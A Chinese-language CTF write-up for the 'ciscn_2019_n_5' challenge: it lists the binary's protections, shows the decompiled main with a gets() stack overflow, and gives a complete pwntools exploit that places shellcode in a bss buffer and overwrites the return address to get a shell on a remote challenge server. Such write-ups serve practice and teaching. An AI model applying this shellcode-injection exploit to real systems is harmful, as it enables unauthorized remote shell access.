ciscn 2019 n 5
# ciscn 2019 n 5
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/ciscn_2019_n_5/ciscn_2019_n_5'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
1
2
3
4
5
6
7
2
3
4
5
6
7
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
char text[30]; // [rsp+0h] [rbp-20h] BYREF
setvbuf(stdout, 0LL, 2, 0LL);
puts("tell me your name");
read(0, name, 0x64uLL);
puts("wow~ nice name!");
puts("What do you want to say to me?");
gets(text);
return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
# 思路分析
目前信息:
main函数内明显的栈溢出漏洞- No PIE
- 有
RWX权限
补充:
name变量在bss段长度为0x64字节
思路:
- 可栈溢出,有
RWX权限,考虑在name变量处写入shellcode,返回溢出劫持返回地址到该处以获得shell
- 可栈溢出,有
# exp
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/ciscn_2019_n_5/ciscn_2019_n_5'
io = remote('node4.buuoj.cn', 28134)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0x20+8
bss_name = 0x601080
shellcode = asm(shellcraft.sh())
payload = flat([shellcode])
io.sendlineafter(' name\n', payload)
payload = flat(['a'*padding, bss_name])
io.sendlineafter(' to me?\n', payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
2
3
4
5
6
7
8
9
10
11
12
13
14
上次更新: 2022/08/15, 00:29:49